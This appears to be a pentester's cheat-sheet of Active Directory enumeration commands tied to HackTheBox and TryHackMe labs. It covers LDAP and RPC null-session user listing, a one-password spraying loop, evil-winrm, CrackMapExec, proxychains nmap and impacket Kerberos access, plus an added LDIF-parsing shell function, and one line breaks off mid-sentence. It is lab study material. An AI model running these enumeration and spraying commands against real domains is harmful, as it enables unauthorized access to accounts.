DNS
Point the Windows client at the DC for name resolution (PowerShell, elevated prompt):
$dnsip = "<DC IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
Then check that the domain name resolves and SYSVOL is reachable:
dir \\za.tryhackme.com\SYSVOL
To try to leak DNS info:
LDAP(389)
First pull the naming contexts (works without credentials only if the DC allows anonymous reads):
ldapsearch -x -H ldap://<ip> -s base namingcontexts
Then pass the right context with -b and add a filter and the attributes you want. Ex:
ldapsearch -x -H ldap://10.10.10.161 -b "DC=htb,DC=local" "(objectClass=person)" sAMAccountName
To use Kerberos authentication (needs a ticket for the user in KRB5CCNAME, and the DC's FQDN rather than its IP in -H so the SPN matches):
ldapsearch -H ldap://dc.absolute.htb -Y GSSAPI -b "cn=users,dc=absolute,dc=htb" -s sub "(objectClass=user)" sAMAccountName description
To get a list of users (-h is gone from newer OpenLDAP, use -H; objectCategory=person drops computer accounts, which are also objectClass=user; anchor the grep so a description that merely contains "sAMAccountName:" is not matched; values with non-ASCII come back base64 as "sAMAccountName::" and need decoding):
ldapsearch -x -H ldap://172.16.5.5 -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectClass=user)(objectCategory=person))" sAMAccountName | grep '^sAMAccountName:' | awk '{print $2}'
Or with windapsearch (anonymous bind, -U enumerates users):
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U
Authenticated (simple bind) examples:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -D 'ldap@support.htb' -w 'password' -b "DC=support,DC=htb" -H ldap://support.htb
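The grep-and-cut pipelines above break on two LDIF features: values that are not plain ASCII are emitted base64-encoded as "attr:: <b64>", and long values are folded onto a following line that begins with a single space (RFC 2849). The function below is an added example, not from the original notes, that turns ldapsearch output into a clean username list while handling both cases. The LDIF sample is constructed inline (no DC was queried) and the DNs in it are made up.

```shell
#!/bin/sh
# Added example (not part of the original notes): extract sAMAccountName values
# from ldapsearch LDIF output, handling base64 ("::") values and folded lines.
# SAMPLE_LDIF is a constructed sample; the DNs are assumptions.

SAMPLE_LDIF='dn: CN=Alice Smith,CN=Users,DC=htb,DC=local
objectClass: user
sAMAccountName: alice

dn: CN=svc_backup,CN=Users,DC=htb,DC=local
sAMAccountName:: c3ZjX2JhY2t1cA==

dn: CN=Long Name,CN=Users,DC=htb,DC=local
sAMAccountName: averyveryverylongserviceaccount
 name_that_was_folded
description: sAMAccountName: not_a_real_one
'

# ldif_users: read LDIF on stdin, print one sAMAccountName per line.
ldif_users() {
  # Step 1: unfold continuation lines (a leading space joins to the previous line).
  awk '
    /^ / { buf = buf substr($0, 2); next }
    { if (buf != "") print buf; buf = $0 }
    END { if (buf != "") print buf }
  ' |
  # Step 2: only lines that START with the attribute count (the description line
  # containing "sAMAccountName:" is ignored); decode the "::" base64 form.
  while IFS= read -r line; do
    case "$line" in
      "sAMAccountName:: "*)
        printf '%s\n' "$(printf '%s' "${line#sAMAccountName:: }" | base64 -d)" ;;
      "sAMAccountName: "*)
        printf '%s\n' "${line#sAMAccountName: }" ;;
    esac
  done
}

# Stand-alone run on the constructed sample:
printf '%s' "$SAMPLE_LDIF" | ldif_users
# Against a live DC (assumed IP/base):
#   ldapsearch -x -H ldap://<IP> -b "DC=htb,DC=local" "(objectClass=user)" sAMAccountName | ldif_users
```

Pipe any of the ldapsearch commands in this section into ldif_users; the same unfold-then-match pattern works for description, memberOf or servicePrincipalName by changing the attribute name in the case patterns.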
RPC
rpcclient -U '' -N <ip>
Then run commands at the rpcclient prompt, e.g. enumdomusers, enumdomgroups, querydispinfo, queryuser <rid>, and getdompwinfo (password policy and lockout threshold, check it before spraying):
If a valid user list is present, spray one password across it (stay under the lockout threshold from getdompwinfo; the Authority line only appears on a successful logon):
while read -r u; do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep -q Authority && echo "$u:Welcome1"; done < valid_users.txt
WinRM(5985)
evil-winrm -u user -p password -i <ip>
SMB(445,139)
CrackMapExec
To check the password and lockout policy over a null session (from Kali):
crackmapexec smb 10.10.10.161 --pass-pol -u '' -p ''
To get TGT hashes for users with
Port scan through a pivot with proxychains (only a full-connect -sT scan goes through SOCKS; -n -Pn skip DNS and ping, which don't traverse the proxy either; --ttl is the integer IP TTL, not a timeout, so it doesn't belong here):
proxychains nmap -n -Pn -sT -F -sV -T4 --max-retries 1 --max-rtt-timeout 2s --open -vvv -oA nmap_results -iL <targets.txt>
To use Kerberos authentication with impacket (ccache from getTGT.py or dumped from a host; use the DC's FQDN so it matches the ticket's SPN, and -target-ip for the actual connection):
KRB5CCNAME=svc_smb.ccache ./smbclient.py -k -no-pass absolute.htb/svc_smb@dc.absolute.htb -target-ip 10.10.11.181